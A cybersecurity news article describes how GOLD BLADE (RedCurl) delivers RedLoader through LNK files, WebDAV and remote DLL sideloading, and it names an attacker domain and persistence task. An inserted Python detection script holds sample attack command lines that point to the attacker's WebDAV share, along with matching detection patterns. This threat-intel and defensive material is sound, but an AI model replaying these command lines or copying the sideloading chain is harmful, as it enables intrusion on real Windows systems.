Cybercriminals Exploit LNK Files to Deploy RedLoader Malware on Windows Systems

In July 2025, the cybercriminal group known as GOLD BLADE, also referred to as RedCurl, Red Wolf, and Earth Kapre, launched a sophisticated campaign targeting Windows systems. This operation combined malicious LNK files with a WebDAV technique to deploy their custom RedLoader malware, marking a significant evolution in their attack strategies.

Background on GOLD BLADE

Active since 2018, GOLD BLADE has a history of conducting corporate espionage across various industries and countries, including Australia, Canada, Germany, Russia, Slovenia, the U.K., Ukraine, and the U.S. Their operations have consistently demonstrated adaptability and a high level of technical proficiency.

The Attack Chain

The campaign began with social engineering tactics, where the attackers distributed seemingly legitimate cover letter PDFs through reputable job platforms like Indeed.com. These documents contained links that, when clicked, automatically downloaded ZIP archives to the victim’s system. This method effectively initiated a multi-stage infection process.

Upon extraction, the ZIP files revealed LNK (shortcut) files designed to appear as standard documents. When executed, these LNK files triggered the Windows Console Host (conhost.exe) to establish a WebDAV connection to a domain hosted on Cloudflare, specifically `automatinghrservices[.]workers[.]dev`. This connection facilitated the download of a renamed copy of Adobe’s legitimate ADNotificationManager.exe executable, which was disguised as a resume document to maintain the ruse.

Remote DLL Sideloading Mechanism

A critical aspect of this campaign was the remote DLL sideloading technique. The downloaded ADNotificationManager.exe, a legitimate and signed executable, was used to load a malicious DLL file named `netutils.dll` from the same remote directory. This approach allowed the attackers to execute malicious code without raising typical security alerts, because the loading process was a signed, legitimate binary.

Once executed, the first stage of RedLoader established persistence on the infected system by creating a scheduled task named `BrowserQE\BrowserQE_`. This task kept the malware active and re-ran its payload on each compromised system.
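As an added defender-side example (not part of the original article or the Sophos report), the following Python sketches detection logic for the three observable artefacts described above: conhost.exe referencing a WebDAV/UNC path, a DLL loaded from a remote share by a process that itself runs from that share, and the `BrowserQE` scheduled task. The event records, field names and event IDs are constructed to resemble Sysmon and Windows Security telemetry and are assumptions, not real captured logs.

```python
import re

# Constructed sample telemetry (not from the report): Sysmon ID 1 (process create),
# Sysmon ID 7 (image load) and Security ID 4698 (scheduled task created).
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"conhost.exe \\automatinghrservices.workers.dev@SSL\DavWWWRoot\Resume.exe"},
    {"id": 7, "image": r"\\automatinghrservices.workers.dev@SSL\DavWWWRoot\Resume.exe",
     "loaded": r"\\automatinghrservices.workers.dev@SSL\DavWWWRoot\netutils.dll"},
    {"id": 4698, "task": r"BrowserQE\BrowserQE_"},
    # Benign records that must not fire: local process and local DLL load.
    {"id": 1, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\cv.txt"},
    {"id": 7, "image": r"C:\Windows\System32\svchost.exe",
     "loaded": r"C:\Windows\System32\netutils.dll"},
]

# UNC path with an optional WebDAV "@SSL" / "@port" suffix, e.g. \\host@SSL\share\...
UNC_WEBDAV = re.compile(r"\\\\([a-z0-9.-]+)(@ssl)?(@\d+)?\\", re.IGNORECASE)
# DLL names the report ties to this campaign's sideloading (assumed watch-list).
SIDELOAD_DLLS = {"netutils.dll"}
TASK_MARKER = re.compile(r"BrowserQE", re.IGNORECASE)


def remote_host(path):
    """Return the remote host named in a UNC/WebDAV path, or None for local paths."""
    m = UNC_WEBDAV.search(path)
    return m.group(1).lower() if m else None


def detect(events):
    """Return (rule, detail) pairs for records matching the RedLoader chain."""
    hits = []
    for e in events:
        if e["id"] == 1 and e["image"].lower().endswith("conhost.exe"):
            host = remote_host(e["cmdline"])
            if host:  # console host reaching out to a remote share is abnormal
                hits.append(("conhost_webdav", host))
        elif e["id"] == 7:
            host = remote_host(e["loaded"])
            name = e["loaded"].rsplit("\\", 1)[-1].lower()
            if host:  # any DLL mapped from a remote share deserves a look
                rule = "remote_sideload" if name in SIDELOAD_DLLS else "remote_dll_load"
                hits.append((rule, f"{name} from {host}"))
        elif e["id"] == 4698 and TASK_MARKER.search(e["task"]):
            hits.append(("redloader_task", e["task"]))
    return hits


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

The `remote_dll_load` rule is deliberately broader than the named `netutils.dll` case so that renamed sideload DLLs from the same infrastructure are still surfaced.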

Evolution of Attack Techniques

Sophos analysts noted that while GOLD BLADE had previously employed WebDAV techniques for remote DLL execution in September 2024 and DLL sideloading methods in March 2025, this July 2025 campaign was the first documented instance where these techniques were combined. This combination represents a significant advancement in their attack methodology, demonstrating their ability to adapt and integrate various techniques to enhance the effectiveness of their operations.

Implications and Recommendations

The use of legitimate system processes and trusted executables in this campaign underscores the challenges in detecting such sophisticated attacks. Traditional security measures may not be sufficient to identify and mitigate these threats.

To protect against similar attacks, organizations and individuals should consider the following measures:

1. Exercise Caution with Email Attachments and Links: Be wary of unsolicited emails, especially those containing attachments or links, even if they appear to come from reputable sources.

2. Implement Advanced Threat Detection Solutions: Utilize security solutions that can detect and respond to advanced threats, including those that exploit legitimate processes.

3. Regularly Update Security Protocols: Keep security software and protocols up to date to defend against evolving threats.

4. Educate Employees: Provide training on recognizing phishing attempts and other social engineering tactics to reduce the risk of successful attacks.

By staying informed about the latest attack vectors and implementing comprehensive security measures, organizations can better defend against sophisticated cyber threats like those posed by GOLD BLADE and their RedLoader malware.